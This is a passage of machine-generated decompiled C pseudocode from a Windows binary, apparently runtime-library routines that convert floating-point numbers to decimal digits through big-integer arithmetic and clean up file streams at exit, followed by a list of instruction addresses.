																				 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
																				_t891 = _t879 + 1 + _t1252;
																				__eflags = _t891;
																				_v1864 = _t891;
																				_t879 = _v1888;
																			}
																			_t886 =  *(_v1908 + _t879 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t886 * _v1896 + _t1206;
																			asm("adc edx, 0x0");
																			_t879 = _v1888 + 1;
																			_t1099 = _t1099 + 1;
																			_v1888 = _t879;
																			_t1206 = _t886 * _v1896 >> 0x20;
																			_t1157 = _v1864;
																			__eflags = _t879 - _v1892;
																			if(_t879 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1206;
																				if(_t1206 == 0) {
																					goto L240;
																				}
																				__eflags = _t1099 - 0x73;
																				if(_t1099 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1099 - _t1157;
																					if(_t1099 == _t1157) {
																						_t558 = _t1273 + _t1099 * 4 - 0x740;
																						 *_t558 =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1099 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t884 = _t1206;
																					_t1206 = 0;
																					 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t884;
																					_t1157 = _v1864;
																					asm("adc edi, edi");
																					_t1099 = _t1099 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1252 - _t1157;
																	if(_t1252 == _t1157) {
																		 *(_t1273 + _t1252 * 4 - 0x740) =  *(_t1273 + _t1252 * 4 - 0x740) & _t878;
																		_t526 = _t1252 + 1; // 0x1
																		_t1157 = _t526;
																		_v1864 = _t1157;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1252 = _t1252 + 1;
																__eflags = _t1252 - _t1098;
															} while (_t1252 != _t1098);
															goto L243;
														}
													} else {
														_t1207 = _v468;
														_v472 = _t1098;
														E0021AA64( &_v468, _t1064,  &_v1396, _t1098 << 2);
														_t1279 =  &(_t1279[4]);
														__eflags = _t1207;
														if(_t1207 == 0) {
															goto L203;
														} else {
															__eflags = _t1207 - 1;
															if(_t1207 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1100 = 0;
																	_v1896 = _v472;
																	_t1253 = 0;
																	__eflags = 0;
																	do {
																		_t900 = _t1207;
																		_t1158 = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) >> 0x20;
																		 *(_t1273 + _t1253 * 4 - 0x1d0) = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) + _t1100;
																		asm("adc edx, 0x0");
																		_t1253 = _t1253 + 1;
																		_t1100 = _t1158;
																		__eflags = _t1253 - _v1896;
																	} while (_t1253 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1208 = _v1396;
													__eflags = _t1208;
													if(_t1208 != 0) {
														__eflags = _t1208 - 1;
														if(_t1208 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1101 = 0;
																_v1896 = _v472;
																_t1254 = 0;
																__eflags = 0;
																do {
																	_t905 = _t1208;
																	_t1159 = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) >> 0x20;
																	 *(_t1273 + _t1254 * 4 - 0x1d0) = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) + _t1101;
																	asm("adc edx, 0x0");
																	_t1254 = _t1254 + 1;
																	_t1101 = _t1159;
																	__eflags = _t1254 - _v1896;
																} while (_t1254 != _v1896);
																L208:
																__eflags = _t1100;
																if(_t1100 == 0) {
																	goto L245;
																} else {
																	_t903 = _v472;
																	__eflags = _t903 - 0x73;
																	if(_t903 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E0021AA64( &_v468, _t1064,  &_v2404, 0);
																		_t1279 =  &(_t1279[4]);
																		_t874 = 0;
																	} else {
																		 *(_t1273 + _t903 * 4 - 0x1d0) = _t1100;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t871 =  &_v2404;
														L244:
														_push(_t871);
														_push(_t1064);
														_push( &_v468);
														E0021AA64();
														_t1279 =  &(_t1279[4]);
														L245:
														_t874 = 1;
													}
												}
												L246:
												__eflags = _t874;
												if(_t874 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t852 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t812 = _v1880 - _v1872;
												__eflags = _t812;
												_v1880 = _t812;
											} while (_t812 != 0);
											_t1085 = _v1884;
											goto L249;
										}
									} else {
										_t908 = _t810 / _t1084;
										_v1908 = _t908;
										_t1102 = _t810 % _t1084;
										_v1896 = _t1102;
										__eflags = _t908;
										if(_t908 == 0) {
											L184:
											__eflags = _t1102;
											if(_t1102 != 0) {
												_t1209 =  *(0x226a9c + _t1102 * 4);
												__eflags = _t1209;
												if(_t1209 != 0) {
													__eflags = _t1209 - 1;
													if(_t1209 != 1) {
														_t909 = _v936;
														_v1896 = _t909;
														__eflags = _t909;
														if(_t909 != 0) {
															_t1255 = 0;
															_t1103 = 0;
															__eflags = 0;
															do {
																_t910 = _t1209;
																_t1163 = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) >> 0x20;
																 *(_t1273 + _t1103 * 4 - 0x3a0) = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) + _t1255;
																asm("adc edx, 0x0");
																_t1103 = _t1103 + 1;
																_t1255 = _t1163;
																__eflags = _t1103 - _v1896;
															} while (_t1103 != _v1896);
															__eflags = _t1255;
															if(_t1255 != 0) {
																_t913 = _v936;
																__eflags = _t913 - 0x73;
																if(_t913 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1273 + _t913 * 4 - 0x3a0) = _t1255;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t908 - 0x26;
												if(_t908 > 0x26) {
													_t908 = 0x26;
												}
												_t1104 =  *(0x226a06 + _t908 * 4) & 0x000000ff;
												_v1888 = _t908;
												_v1400 = ( *(0x226a06 + _t908 * 4) & 0x000000ff) + ( *(0x226a07 + _t908 * 4) & 0x000000ff);
												E0020E920(_t1104 << 2,  &_v1396, 0, _t1104 << 2);
												_t926 = E0020EA80( &(( &_v1396)[_t1104]), 0x226100 + ( *(0x226a04 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0x226a07 + _t908 * 4) & 0x000000ff) << 2);
												_t1105 = _v1400;
												_t1279 =  &(_t1279[6]);
												_v1892 = _t1105;
												__eflags = _t1105 - 1;
												if(_t1105 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1105 - _v936;
														_t1212 =  &_v1396;
														_t927 = _t926 & 0xffffff00 | _t1105 - _v936 > 0x00000000;
														__eflags = _t927;
														if(_t927 != 0) {
															_t1164 =  &_v932;
														} else {
															_t1212 =  &_v932;
															_t1164 =  &_v1396;
														}
														_v1876 = _t1164;
														__eflags = _t927;
														if(_t927 == 0) {
															_t1105 = _v936;
														}
														_v1880 = _t1105;
														__eflags = _t927;
														if(_t927 != 0) {
															_v1892 = _v936;
														}
														_t1165 = 0;
														_t1257 = 0;
														_v1864 = 0;
														__eflags = _t1105;
														if(_t1105 == 0) {
															L177:
															_v936 = _t1165;
															_t929 = _t1165 << 2;
															__eflags = _t929;
															goto L178;
														} else {
															_t1213 = _t1212 -  &_v1860;
															__eflags = _t1213;
															_v1928 = _t1213;
															do {
																_t937 =  *(_t1273 + _t1213 + _t1257 * 4 - 0x740);
																_v1884 = _t937;
																__eflags = _t937;
																if(_t937 != 0) {
																	_t938 = 0;
																	_t1214 = 0;
																	_t1106 = _t1257;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1106 - 0x73;
																		if(_t1106 == 0x73) {
																			goto L187;
																		} else {
																			_t1213 = _v1928;
																			_t1105 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1106 - 0x73;
																			if(_t1106 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1106 - _t1165;
																			if(_t1106 == _t1165) {
																				 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
																				_t950 = _t938 + 1 + _t1257;
																				__eflags = _t950;
																				_v1864 = _t950;
																				_t938 = _v1872;
																			}
																			_t945 =  *(_v1876 + _t938 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t945 * _v1884 + _t1214;
																			asm("adc edx, 0x0");
																			_t938 = _v1872 + 1;
																			_t1106 = _t1106 + 1;
																			_v1872 = _t938;
																			_t1214 = _t945 * _v1884 >> 0x20;
																			_t1165 = _v1864;
																			__eflags = _t938 - _v1892;
																			if(_t938 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1214;
																				if(_t1214 == 0) {
																					goto L174;
																				}
																				__eflags = _t1106 - 0x73;
																				if(_t1106 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t940 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1106 - _t1165;
																					if(_t1106 == _t1165) {
																						_t370 = _t1273 + _t1106 * 4 - 0x740;
																						 *_t370 =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1106 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t943 = _t1214;
																					_t1214 = 0;
																					 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t943;
																					_t1165 = _v1864;
																					asm("adc edi, edi");
																					_t1106 = _t1106 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1257 - _t1165;
																	if(_t1257 == _t1165) {
																		 *(_t1273 + _t1257 * 4 - 0x740) =  *(_t1273 + _t1257 * 4 - 0x740) & _t937;
																		_t338 = _t1257 + 1; // 0x1
																		_t1165 = _t338;
																		_v1864 = _t1165;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1257 = _t1257 + 1;
																__eflags = _t1257 - _t1105;
															} while (_t1257 != _t1105);
															goto L177;
														}
													} else {
														_t1215 = _v932;
														_v936 = _t1105;
														E0021AA64( &_v932, _t1064,  &_v1396, _t1105 << 2);
														_t1279 =  &(_t1279[4]);
														__eflags = _t1215;
														if(_t1215 != 0) {
															__eflags = _t1215 - 1;
															if(_t1215 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1107 = 0;
																	_v1884 = _v936;
																	_t1258 = 0;
																	__eflags = 0;
																	do {
																		_t958 = _t1215;
																		_t1166 = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) >> 0x20;
																		 *(_t1273 + _t1258 * 4 - 0x3a0) = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) + _t1107;
																		asm("adc edx, 0x0");
																		_t1258 = _t1258 + 1;
																		_t1107 = _t1166;
																		__eflags = _t1258 - _v1884;
																	} while (_t1258 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t930 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1216 = _v1396;
													__eflags = _t1216;
													if(_t1216 != 0) {
														__eflags = _t1216 - 1;
														if(_t1216 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1108 = 0;
																_v1884 = _v936;
																_t1259 = 0;
																__eflags = 0;
																do {
																	_t965 = _t1216;
																	_t1167 = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) >> 0x20;
																	 *(_t1273 + _t1259 * 4 - 0x3a0) = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) + _t1108;
																	asm("adc edx, 0x0");
																	_t1259 = _t1259 + 1;
																	_t1108 = _t1167;
																	__eflags = _t1259 - _v1884;
																} while (_t1259 != _v1884);
																L149:
																__eflags = _t1107;
																if(_t1107 == 0) {
																	goto L180;
																} else {
																	_t961 = _v936;
																	__eflags = _t961 - 0x73;
																	if(_t961 < 0x73) {
																		 *(_t1273 + _t961 * 4 - 0x3a0) = _t1107;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t940 =  &_v1396;
																		L188:
																		_push(_t940);
																		_push(_t1064);
																		_push( &_v932);
																		E0021AA64();
																		_t1279 =  &(_t1279[4]);
																		_t933 = 0;
																	}
																}
															}
														}
													} else {
														_t929 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t929);
														_t930 =  &_v1860;
														L179:
														_push(_t930);
														_push(_t1064);
														_push( &_v932);
														E0021AA64();
														_t1279 =  &(_t1279[4]);
														L180:
														_t933 = 1;
													}
												}
												L181:
												__eflags = _t933;
												if(_t933 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t852 =  &_v932;
													L262:
													_push(_t1064);
													_push(_t852);
													E0021AA64();
													_t1279 =  &(_t1279[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t908 = _v1908 - _v1888;
												__eflags = _t908;
												_v1908 = _t908;
											} while (_t908 != 0);
											_t1102 = _v1896;
											goto L184;
										}
									}
									L263:
									_t1196 = _v1920;
									_t1245 = _t1196;
									_t1086 = _v472;
									_v1872 = _t1245;
									__eflags = _t1086;
									if(_t1086 != 0) {
										_t1249 = 0;
										_t1200 = 0;
										__eflags = 0;
										do {
											_t841 =  *(_t1273 + _t1200 * 4 - 0x1d0);
											_t1153 = 0xa;
											_t1154 = _t841 * _t1153 >> 0x20;
											 *(_t1273 + _t1200 * 4 - 0x1d0) = _t841 * _t1153 + _t1249;
											asm("adc edx, 0x0");
											_t1200 = _t1200 + 1;
											_t1249 = _t1154;
											__eflags = _t1200 - _t1086;
										} while (_t1200 != _t1086);
										_v1896 = _t1249;
										__eflags = _t1249;
										_t1245 = _v1872;
										if(_t1249 != 0) {
											_t1095 = _v472;
											__eflags = _t1095 - 0x73;
											if(_t1095 >= 0x73) {
												__eflags = 0;
												_v2408 = 0;
												_v472 = 0;
												E0021AA64( &_v468, _t1064,  &_v2404, 0);
												_t1279 =  &(_t1279[4]);
											} else {
												 *(_t1273 + _t1095 * 4 - 0x1d0) = _t1154;
												_v472 = _v472 + 1;
											}
										}
										_t1196 = _t1245;
									}
									_t815 = E0021C0B0( &_v472,  &_v936);
									_t1146 = 0xa;
									__eflags = _t815 - _t1146;
									if(_t815 != _t1146) {
										__eflags = _t815;
										if(_t815 != 0) {
											_t816 = _t815 + 0x30;
											__eflags = _t816;
											_t1245 = _t1196 + 1;
											 *_t1196 = _t816;
											_v1872 = _t1245;
											goto L282;
										} else {
											_t817 = _v1904 - 1;
										}
									} else {
										_v1904 = _v1904 + 1;
										_t1245 = _t1196 + 1;
										_t832 = _v936;
										 *_t1196 = 0x31;
										_v1872 = _t1245;
										__eflags = _t832;
										if(_t832 != 0) {
											_t1199 = 0;
											_t1248 = _t832;
											_t1094 = 0;
											__eflags = 0;
											do {
												_t833 =  *(_t1273 + _t1094 * 4 - 0x3a0);
												 *(_t1273 + _t1094 * 4 - 0x3a0) = _t833 * _t1146 + _t1199;
												asm("adc edx, 0x0");
												_t1094 = _t1094 + 1;
												_t1199 = _t833 * _t1146 >> 0x20;
												_t1146 = 0xa;
												__eflags = _t1094 - _t1248;
											} while (_t1094 != _t1248);
											_t1245 = _v1872;
											__eflags = _t1199;
											if(_t1199 != 0) {
												_t836 = _v936;
												__eflags = _t836 - 0x73;
												if(_t836 >= 0x73) {
													_v2408 = 0;
													_v936 = 0;
													E0021AA64( &_v932, _t1064,  &_v2404, 0);
													_t1279 =  &(_t1279[4]);
												} else {
													 *(_t1273 + _t836 * 4 - 0x3a0) = _t1199;
													_v936 = _v936 + 1;
												}
											}
										}
										L282:
										_t817 = _v1904;
									}
									 *((intOrPtr*)(_v1924 + 4)) = _t817;
									_t1070 = _v1916;
									__eflags = _t817;
									if(_t817 >= 0) {
										__eflags = _t1070 - 0x7fffffff;
										if(_t1070 <= 0x7fffffff) {
											_t1070 = _t1070 + _t817;
											__eflags = _t1070;
										}
									}
									_t819 = _a24 - 1;
									__eflags = _t819 - _t1070;
									if(_t819 >= _t1070) {
										_t819 = _t1070;
									}
									_t755 = _t819 + _v1920;
									_v1916 = _t755;
									__eflags = _t1245 - _t755;
									if(__eflags != 0) {
										while(1) {
											_t755 = _v472;
											__eflags = _t755;
											if(__eflags == 0) {
												goto L303;
											}
											_t1197 = 0;
											_t1246 = _t755;
											_t1090 = 0;
											__eflags = 0;
											do {
												_t820 =  *(_t1273 + _t1090 * 4 - 0x1d0);
												 *(_t1273 + _t1090 * 4 - 0x1d0) = _t820 * 0x3b9aca00 + _t1197;
												asm("adc edx, 0x0");
												_t1090 = _t1090 + 1;
												_t1197 = _t820 * 0x3b9aca00 >> 0x20;
												__eflags = _t1090 - _t1246;
											} while (_t1090 != _t1246);
											_t1247 = _v1872;
											__eflags = _t1197;
											if(_t1197 != 0) {
												_t826 = _v472;
												__eflags = _t826 - 0x73;
												if(_t826 >= 0x73) {
													__eflags = 0;
													_v2408 = 0;
													_v472 = 0;
													E0021AA64( &_v468, _t1064,  &_v2404, 0);
													_t1279 =  &(_t1279[4]);
												} else {
													 *(_t1273 + _t826 * 4 - 0x1d0) = _t1197;
													_v472 = _v472 + 1;
												}
											}
											_t825 = E0021C0B0( &_v472,  &_v936);
											_t1198 = 8;
											_t1070 = _v1916 - _t1247;
											__eflags = _t1070;
											do {
												_t708 = _t825 % _v1912;
												_t825 = _t825 / _v1912;
												_t1151 = _t708 + 0x30;
												__eflags = _t1070 - _t1198;
												if(_t1070 >= _t1198) {
													 *((char*)(_t1198 + _t1247)) = _t1151;
												}
												_t1198 = _t1198 - 1;
												__eflags = _t1198 - 0xffffffff;
											} while (_t1198 != 0xffffffff);
											__eflags = _t1070 - 9;
											if(_t1070 > 9) {
												_t1070 = 9;
											}
											_t1245 = _t1247 + _t1070;
											_v1872 = _t1245;
											__eflags = _t1245 - _v1916;
											if(__eflags != 0) {
												continue;
											}
											goto L303;
										}
									}
									L303:
									 *_t1245 = 0;
									goto L309;
								}
							}
						}
					}
				} else {
					_t1070 = _t1236 & 0x000fffff;
					if((_t1188 | _t1236 & 0x000fffff) != 0) {
						goto L5;
					} else {
						_push(0x226ac4);
						 *((intOrPtr*)(_v1924 + 4)) =  *(_v1924 + 4) & 0x00000000;
						L308:
						_push(_a24);
						_push(_t1055);
						if(E002179F6() != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00217DBB();
							asm("int3");
							E0020E2F0(_t1142, 0x22a9e8, 0x10);
							_v32 = _v32 & 0x00000000;
							E00219931(8);
							_pop(_t1071);
							_t721 =  &_v8;
							 *_t721 = _v8 & 0x00000000;
							__eflags =  *_t721;
							_t1237 = 3;
							while(1) {
								_v36 = _t1237;
								__eflags = _t1237 -  *0x250404; // 0x200
								if(__eflags == 0) {
									break;
								}
								_t763 =  *0x250408; // 0x0
								_t764 =  *(_t763 + _t1237 * 4);
								__eflags = _t764;
								if(_t764 != 0) {
									__eflags =  *(_t764 + 0xc) >> 0x0000000d & 0x00000001;
									if(__eflags != 0) {
										_t773 =  *0x250408; // 0x0
										_push( *((intOrPtr*)(_t773 + _t1237 * 4)));
										_t774 = E0021EC83(_t1071, _t1142, __eflags);
										__eflags = _t774 - 0xffffffff;
										if(_t774 != 0xffffffff) {
											_t731 =  &_v32;
											 *_t731 = _v32 + 1;
											__eflags =  *_t731;
										}
									}
									_t767 =  *0x250408; // 0x0
									DeleteCriticalSection( *((intOrPtr*)(_t767 + _t1237 * 4)) + 0x20);
									_t770 =  *0x250408; // 0x0
									E00217A50( *((intOrPtr*)(_t770 + _t1237 * 4)));
									_pop(_t1071);
									_t772 =  *0x250408; // 0x0
									_t737 = _t772 + _t1237 * 4;
									 *_t737 =  *(_t772 + _t1237 * 4) & 0x00000000;
									__eflags =  *_t737;
								}
								_t1237 = _t1237 + 1;
							}
							_v8 = 0xfffffffe;
							E0021D991();
							return E0020E336(_t1142);
						} else {
							L309:
							_t1286 = _v1936;
							if(_v1936 != 0) {
								_t755 = E0021DFE5(_t1070, _t1286,  &_v1944);
							}
							return E0020E203(_t755, _v8 ^ _t1273);
						}
					}
				}
			}































































































































































































































































          0x0021c55e
          0x0021c561
          0x0021c563
          0x0021c569
          0x0021c570
          0x0021c574
          0x0021c57d
          0x0021c57e
          0x0021c57f
          0x0021c582
          0x0021c588
          0x0021c58e
          0x0021c593
          0x0021c5a2
          0x0021c5a4
          0x0021c5a6
          0x0021c5a6
          0x0021c5ad
          0x0021c5b7
          0x0021c5bc
          0x0021c5bf
          0x0021c5e3
          0x0021c5e7
          0x0021c5ec
          0x0021c5ed
          0x0021c5ef
          0x0021c5f1
          0x0021c5f7
          0x0021c5f7
          0x0021c5fe
          0x0021c5fe
          0x0021c601
          0x0021d8b1
          0x00000000
          0x0021c607
          0x0021c607
          0x0021c607
          0x0021c60a
          0x0021d8aa
          0x00000000
          0x0021c610
          0x0021c610
          0x0021c610
          0x0021c613
          0x0021d8a3
          0x00000000
          0x0021c619
          0x0021c619
          0x0021c61c
          0x0021d89c
          0x00000000
          0x0021c622
          0x0021c62b
          0x0021c633
          0x0021c636
          0x0021c639
          0x0021c63c
          0x0021c642
          0x0021c64a
          0x0021c650
          0x0021c65a
          0x0021c65a
          0x0021c65d
          0x0021c665
          0x0021c66c
          0x0021c66c
          0x0021c65f
          0x0021c65f
          0x0021c661
          0x0021c674
          0x0021c67a
          0x0021c67c
          0x0021c680
          0x0021c685
          0x0021c692
          0x0021c694
          0x0021c69a
          0x0021c69f
          0x0021c6a0
          0x0021c6a1
          0x0021c6ab
          0x0021c6b0
          0x0021c6b6
          0x0021c6bb
          0x0021c6c4
          0x0021c6c4
          0x0021c6c6
          0x0021c6bd
          0x0021c6bd
          0x0021c6c2
          0x00000000
          0x00000000
          0x0021c6c2
          0x0021c6cc
          0x0021c6d4
          0x0021c6d6
          0x0021c6df
          0x0021c6e0
          0x0021c6e6
          0x0021c6e8
          0x0021cadb
          0x0021cae1
          0x0021cc00
          0x0021cc00
          0x0021cc07
          0x0021cc07
          0x0021cc07
          0x0021cc0e
          0x0021cc11
          0x0021cc18
          0x0021cc18
          0x0021cc13
          0x0021cc13
          0x0021cc13
          0x0021cc1c
          0x0021cc1d
          0x0021cc1f
          0x0021cc22
          0x0021cc25
          0x0021cc28
          0x0021cc2e
          0x0021cc31
          0x0021cc34
          0x0021cc3e
          0x0021cc3e
          0x0021cc3e
          0x0021cc36
          0x0021cc36
          0x0021cc38
          0x00000000
          0x0021cc3a
          0x0021cc3a
          0x0021cc3a
          0x0021cc38
          0x0021cc40
          0x0021cc42
          0x0021cce3
          0x0021cce3
          0x0021ccf0
          0x0021ccf0
          0x0021ccf0
          0x0021cd06
          0x0021cd0b
          0x0021cc48
          0x0021cc48
          0x0021cc4a
          0x00000000
          0x0021cc50
          0x0021cc52
          0x0021cc53
          0x0021cc55
          0x0021cc57
          0x0021cc57
          0x0021cc59
          0x0021cc5c
          0x0021cc64
          0x0021cc66
          0x0021cc69
          0x0021cc6f
          0x0021cc6f
          0x0021cc71
          0x0021cc7d
          0x0021cc7d
          0x0021cc7d
          0x0021cc73
          0x0021cc75
          0x0021cc75
          0x0021cc84
          0x0021cc87
          0x0021cc89
          0x0021cc90
          0x0021cc90
          0x0021cc8b
          0x0021cc8b
          0x0021cc8b
          0x0021cc98
          0x0021cca2
          0x0021cca8
          0x0021cca9
          0x0021ccae
          0x0021ccb4
          0x0021ccb7
          0x00000000
          0x00000000
          0x0021ccb9
          0x0021ccb9
          0x0021ccc1
          0x0021ccc1
          0x0021ccc7
          0x0021ccce
          0x0021ccdb
          0x0021ccd0
          0x0021ccd0
          0x0021ccd3
          0x0021ccd3
          0x0021ccce
          0x0021cc4a
          0x0021cd17
          0x0021cd27
          0x0021cd34
          0x0021cd36
          0x0021cd3d
          0x0021cae7
          0x0021cae7
          0x0021caf0
          0x0021caf1
          0x0021cafb
          0x0021cb01
          0x0021cb03
          0x0021cb09
          0x0021cb09
          0x0021cb0b
          0x0021cb0b
          0x0021cb12
          0x0021cb19
          0x00000000
          0x00000000
          0x0021cb1f
          0x0021cb22
          0x0021cb25
          0x00000000
          0x0021cb27
          0x0021cb27
          0x0021cb27
          0x0021cb27
          0x0021cb2e
          0x0021cb31
          0x0021cb38
          0x0021cb38
          0x0021cb33
          0x0021cb33
          0x0021cb33
          0x0021cb3c
          0x0021cb3f
          0x0021cb41
          0x0021cb43
          0x0021cb49
          0x0021cb4f
          0x0021cb51
          0x0021cb51
          0x0021cb51
          0x0021cb58
          0x0021cb58
          0x0021cb5a
          0x0021cb66
          0x0021cb66
          0x0021cb66
          0x0021cb5c
          0x0021cb5e
          0x0021cb5e
          0x0021cb6d
          0x0021cb70
          0x0021cb72
          0x0021cb79
          0x0021cb79
          0x0021cb74
          0x0021cb74
          0x0021cb74
          0x0021cb81
          0x0021cb8c
          0x0021cb92
          0x0021cb93
          0x0021cb98
          0x0021cb9e
          0x0021cba1
          0x00000000
          0x00000000
          0x0021cba3
          0x0021cba3
          0x0021cbad
          0x0021cbb8
          0x0021cbc0
          0x0021cbc6
          0x0021cbd1
          0x0021cbd7
          0x0021cbde
          0x0021cbf1
          0x0021cbf8
          0x0021cbf8
          0x00000000
          0x0021cb25
          0x0021cb0b
          0x00000000
          0x0021cb03
          0x0021cd40
          0x0021cd40
          0x0021cd46
          0x0021cd4b
          0x0021cd51
          0x0021cd64
          0x0021cd69
          0x0021c6ee
          0x0021c6ee
          0x0021c6f7
          0x0021c6f8
          0x0021c702
          0x0021c708
          0x0021c70a
          0x0021c910
          0x0021c918
          0x0021c91b
          0x0021c920
          0x0021c923
          0x0021c92b
          0x0021c92f
          0x0021c935
          0x0021c93b
          0x0021c940
          0x0021c947
          0x0021c948
          0x0021c948
          0x0021c948
          0x0021c94f
          0x0021c952
          0x0021c95a
          0x0021c960
          0x0021c965
          0x0021c965
          0x0021c962
          0x0021c962
          0x0021c962
          0x0021c969
          0x0021c96a
          0x0021c96c
          0x0021c96f
          0x0021c975
          0x0021c97b
          0x0021c97e
          0x0021c981
          0x0021c987
          0x0021c98a
          0x0021c98d
          0x0021c997
          0x0021c997
          0x0021c997
          0x0021c98f
          0x0021c98f
          0x0021c991
          0x00000000
          0x0021c993
          0x0021c993
          0x0021c993
          0x0021c991
          0x0021c999
          0x0021c99b
          0x0021ca8d
          0x0021ca8d
          0x0021ca8f
          0x0021ca95
          0x0021ca9b
          0x0021cab0
          0x0021cab5
          0x0021c9a1
          0x0021c9a1
          0x0021c9a3
          0x00000000
          0x0021c9a9
          0x0021c9ab
          0x0021c9ac
          0x0021c9ae
          0x0021c9b0
          0x0021c9b2
          0x0021c9b2
          0x0021c9b8
          0x0021c9ba
          0x0021c9c0
          0x0021c9c3
          0x0021c9d1
          0x0021c9d7
          0x0021c9d7
          0x0021c9d9
          0x0021c9dc
          0x0021c9e2
          0x0021c9e2
          0x0021c9e4
          0x00000000
          0x00000000
          0x0021c9e6
          0x0021c9e8
          0x0021c9ee
          0x0021c9ee
          0x0021c9ea
          0x0021c9ea
          0x0021c9ea
          0x0021c9f3
          0x0021c9f5
          0x0021c9fc
          0x0021c9fc
          0x0021c9f7
          0x0021c9f7
          0x0021c9f7
          0x0021ca22
          0x0021ca28
          0x0021ca2b
          0x0021ca31
          0x0021ca38
          0x0021ca39
          0x0021ca3a
          0x0021ca40
          0x0021ca43
          0x0021ca45
          0x00000000
          0x0021ca45
          0x00000000
          0x0021ca43
          0x0021ca4d
          0x0021ca53
          0x0021ca5b
          0x0021ca5b
          0x0021ca5c
          0x0021ca5e
          0x0021ca62
          0x0021ca6a
          0x0021ca6a
          0x0021ca6a
          0x0021ca6c
          0x0021ca73
          0x0021ca78
          0x0021ca85
          0x0021ca7a
          0x0021ca7d
          0x0021ca7d
          0x0021ca78
          0x0021c9a3
          0x0021cab8
          0x0021cac2
          0x0021cac8
          0x0021cace
          0x0021cad4
          0x0021c710
          0x0021c710
          0x0021c710
          0x0021c712
          0x0021c719
          0x0021c720
          0x00000000
          0x00000000
          0x0021c726
          0x0021c729
          0x0021c72c
          0x00000000
          0x0021c72e
          0x0021c736
          0x0021c73b
          0x0021c740
          0x0021c741
          0x0021c743
          0x0021c74b
          0x0021c74f
          0x0021c755
          0x0021c75b
          0x0021c760
          0x0021c767
          0x0021c767
          0x0021c768
          0x0021c76b
          0x0021c773
          0x0021c779
          0x0021c77e
          0x0021c77e
          0x0021c77b
          0x0021c77b
          0x0021c77b
          0x0021c782
          0x0021c783
          0x0021c785
          0x0021c788
          0x0021c78e
          0x0021c794
